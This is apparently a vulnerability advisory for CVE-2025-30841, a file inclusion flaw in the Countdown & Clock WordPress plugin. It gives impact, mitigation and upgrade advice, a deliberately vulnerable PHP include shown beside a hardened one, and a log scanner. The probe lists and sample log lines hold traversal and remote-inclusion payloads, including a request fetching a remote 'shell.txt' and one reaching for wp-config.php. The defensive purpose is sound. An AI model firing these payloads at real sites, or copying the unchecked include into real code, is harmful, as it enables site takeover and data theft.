Platform: wordpress
Component: countdown-builder
Fixed in: 2.8.9
CVE-2025-30841 is a Remote Code Execution (RCE) vulnerability in the Countdown & Clock WordPress plugin (slug countdown-builder). The root cause is an improper limitation of a pathname to a restricted directory (path traversal) in a PHP include: a request-controlled value reaches an include without being confined to the plugin's own directory, so an attacker can make the server include a file of their choosing and execute the PHP it contains (PHP Remote File Inclusion, RFI). All versions up to and including 2.8.8 are affected; the fix ships in version 2.8.9.
The impact is severe. An attacker who reaches the vulnerable include gets the web server's PHP process to run code they control, which in practice means control of the WordPress site and of whatever the web server account can read or write. Data at risk includes the WordPress database (user records, password hashes, configuration), the site's files, and, if the host is not properly segmented, other systems on the same network. The blast radius also extends to the site's visitors, since an attacker with code execution can inject malicious content or redirect users to phishing pages.
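The following is an added illustration of the vulnerability class this advisory describes (a request-controlled path reaching PHP's include) next to a hardened replacement. It is not the Countdown & Clock plugin's code: the `template` parameter, the `templates/` directory, the template names and the `render_*` functions are assumptions made for the example.

```php
<?php
// Added illustration of the vulnerability class behind this advisory (a request-
// controlled path reaching include()) and a hardened replacement. This is NOT
// the Countdown & Clock plugin's code: the 'template' parameter, the templates/
// directory and the template names are assumptions made for the example.

// --- Vulnerable form --------------------------------------------------------
// Whatever the client sends is concatenated onto the include path unchecked.
// "../" walks out of templates/ (local file inclusion); with allow_url_include
// enabled, "http://attacker/x.txt" makes PHP fetch and run remote code (RFI).
function render_vulnerable(array $params): void
{
    $base = __DIR__ . '/templates/';
    include $base . $params['template'];
}

// --- Hardened form ----------------------------------------------------------
// Resolve a template name to an absolute path, or null if it is not acceptable.
function resolve_template(string $requested, string $baseDir): ?string
{
    // 1. Syntactic allowlist: a bare name, no separators, dots or schemes.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $requested)) {
        return null;
    }
    // 2. Semantic allowlist: only templates the plugin actually ships.
    static $allowed = ['default', 'circle', 'flip'];
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 3. Canonicalise both sides and require the target to sit under $baseDir.
    //    realpath() collapses "..", follows symlinks and returns false for
    //    missing files, so a dangling allowlist entry is rejected instead of
    //    being handed to include().
    $baseReal = realpath($baseDir);
    $target   = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($baseReal === false || $target === false) {
        return null;
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

function render_hardened(array $params): void
{
    $path = resolve_template((string) ($params['template'] ?? ''), __DIR__ . '/templates');
    if ($path === null) {
        http_response_code(400);
        echo 'invalid template';
        return;
    }
    include $path;
}

// --- Self-check against a constructed templates/ directory ------------------
$root = sys_get_temp_dir() . '/cb_demo_' . getmypid();
mkdir($root . '/templates', 0700, true);
file_put_contents($root . '/templates/default.php', "<?php echo \"default template\\n\";\n");
file_put_contents($root . '/secret.txt', "must never be included\n");

$probes = [
    'default',                    // legitimate
    'flip',                       // allowlisted but not present on disk
    '../secret.txt',              // classic traversal
    '..%2F..%2Fetc%2Fpasswd',     // URL-encoded traversal
    'http://203.0.113.9/x.txt',   // remote file inclusion attempt
    "default\0.txt",              // null-byte truncation attempt
];
foreach ($probes as $p) {
    $r = resolve_template($p, $root . '/templates');
    printf("%-28s -> %s\n", addcslashes($p, "\0"), $r === null ? 'rejected' : 'include ' . $r);
}

// Remove the temporary files again.
unlink($root . '/templates/default.php');
unlink($root . '/secret.txt');
rmdir($root . '/templates');
rmdir($root);
```

Run it with `php` from the command line; only the `default` probe resolves, the others are rejected. The three layers are deliberately redundant: the regex alone stops traversal and schemes, the allowlist stops inclusion of unexpected but syntactically valid names, and the `realpath` containment check protects against a future change that loosens the first two.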
CVE-2025-30841 was publicly disclosed on 2025-04-01 and is rated CRITICAL (CVSS 9.9). Public proof-of-concept code is likely to appear, since file inclusion bugs of this kind are simple to exploit once the vulnerable parameter is known, and the plugin's popularity makes widespread exploitation plausible. It is not currently listed on CISA KEV.
Exploit Status
EPSS: 0.40% (61st percentile)
The primary mitigation is to upgrade the Countdown & Clock plugin to version 2.8.9 or later. If you cannot upgrade immediately, deactivate the plugin or block requests to its files under wp-content/plugins/countdown-builder/ at the web server or WAF until you can. WAF rules should drop requests whose parameters contain traversal sequences (../ and ..\, including their URL-encoded and double-encoded forms such as %2e%2e%2f and %252e%252e%252f) or URL schemes and PHP stream wrappers (http://, https://, php://, data:, phar://) where a filename is expected. As general PHP hardening, keep allow_url_include set to Off (the default); that removes the remote-URL form of the inclusion but not inclusion of files already on the server. Monitor access logs for requests to the plugin's path carrying such parameters and for unexpected 500 responses from it. After upgrading, verify the fix by checking that the installed plugin version is 2.8.9 or later rather than by replaying an inclusion attempt against production.
Update the Countdown & Clock plugin to the latest available version to close the file inclusion vulnerability. Check for updates in the WordPress admin or on the WordPress.org plugin repository. Take a full backup of the site files and database before applying any update.
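As an added example of the log monitoring recommended above (not part of this advisory or of the plugin), here is a small scanner that flags access-log requests carrying traversal sequences or remote/stream-wrapper URLs in their parameters and notes when they target the countdown-builder plugin path. The sample log lines, the `view.php` file and the `tpl`/`file` parameter names in them are constructed for the demo; the page does not name the real vulnerable parameter, which is why the scan is parameter-agnostic.

```php
<?php
// Added example of the log monitoring this section recommends: flags access-log
// requests carrying traversal sequences or remote/stream-wrapper URLs in their
// parameters, and notes when they target the countdown-builder plugin path.
// Not the advisory's or the plugin's code. The sample log lines and the
// parameter/file names in them are constructed for the example.

const PLUGIN_PATH = '/wp-content/plugins/countdown-builder/';

// Schemes that make include() read a remote resource or a PHP stream instead of a local file.
const RISKY_SCHEMES = ['http://', 'https://', 'ftp://', 'php://', 'data:', 'expect://', 'phar://', 'file://'];

// URL-decode repeatedly so double-encoded payloads (%252e%252e%252f) normalise to "../".
function deep_decode(string $s, int $maxRounds = 3): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $decoded = rawurldecode($s);
        if ($decoded === $s) {
            break;
        }
        $s = $decoded;
    }
    return $s;
}

// Inspect one combined-log-format line; returns a list of findings (empty = nothing suspicious).
function inspect_line(string $line): array
{
    // Pull the request target out of the quoted "METHOD target HTTP/x.y" field.
    if (!preg_match('#"(?:GET|POST|PUT|HEAD|OPTIONS) (\S+) HTTP/[\d.]+"#', $line, $m)) {
        return [];
    }
    $parts = parse_url($m[1]);
    if ($parts === false) {
        return ['unparseable request target'];
    }
    $path = $parts['path'] ?? '';
    parse_str($parts['query'] ?? '', $params);   // one level of URL decoding happens here

    $findings = [];
    foreach ($params as $name => $value) {
        if (is_array($value)) {
            continue;                            // nested array parameters are out of scope here
        }
        $v = deep_decode(str_replace('\\', '/', (string) $value));
        if (preg_match('#(^|/)\.\.(/|$)#', $v)) {
            $findings[] = "traversal in '$name'";
        }
        if (strpos($v, "\0") !== false) {
            $findings[] = "null byte in '$name'";
        }
        foreach (RISKY_SCHEMES as $scheme) {
            if (stripos($v, $scheme) === 0) {
                $findings[] = "scheme $scheme in '$name'";
            }
        }
    }
    if ($findings !== [] && strncmp($path, PLUGIN_PATH, strlen(PLUGIN_PATH)) === 0) {
        $findings[] = 'targets countdown-builder';
    }
    return $findings;
}

// Constructed sample lines (view.php, tpl= and file= are invented for the demo).
$sample = [
    '203.0.113.7 - - [01/Apr/2025:10:00:01 +0000] "GET /wp-content/plugins/countdown-builder/public/view.php?tpl=default HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Apr/2025:10:00:02 +0000] "GET /wp-content/plugins/countdown-builder/public/view.php?tpl=../../../../wp-config.php HTTP/1.1" 500 0',
    '203.0.113.7 - - [01/Apr/2025:10:00:03 +0000] "GET /wp-content/plugins/countdown-builder/public/view.php?tpl=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 500 0',
    '203.0.113.7 - - [01/Apr/2025:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=cb_preview&file=http://203.0.113.99/shell.txt HTTP/1.1" 200 33',
    '198.51.100.4 - - [01/Apr/2025:10:00:05 +0000] "GET /?p=42 HTTP/1.1" 200 9001',
];

foreach ($sample as $i => $line) {
    $f = inspect_line($line);
    printf("line %d: %s\n", $i + 1, $f === [] ? 'clean' : implode('; ', $f));
}
```

Lines 2 and 3 are reported as traversal against the plugin path (line 3 only after the second decoding round), line 4 as a remote scheme in a parameter, and lines 1 and 5 as clean. To run it over a real log, replace the `$sample` array with a loop reading lines from `STDIN` and feed it `access.log`; POST bodies are not in the access log, so the same checks should also be applied at the WAF, where the body is visible.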
CVE-2025-30841 is a critical Remote Code Execution vulnerability in the Countdown & Clock WordPress plugin: a path traversal in a PHP include lets an attacker have the server include and execute a file of their choosing.
You are affected if you run any version of Countdown & Clock up to and including 2.8.8. Check the installed plugin version and update immediately.
Upgrade the Countdown & Clock plugin to version 2.8.9 or later to patch the vulnerability. If an immediate upgrade is not possible, deactivate the plugin or block requests to its files until you can upgrade.
While no active exploitation has been confirmed, the ease of exploitation suggests a high probability of exploitation in the near future.
Refer to the official Countdown & Clock plugin website or WordPress plugin repository for the latest security advisory and update information.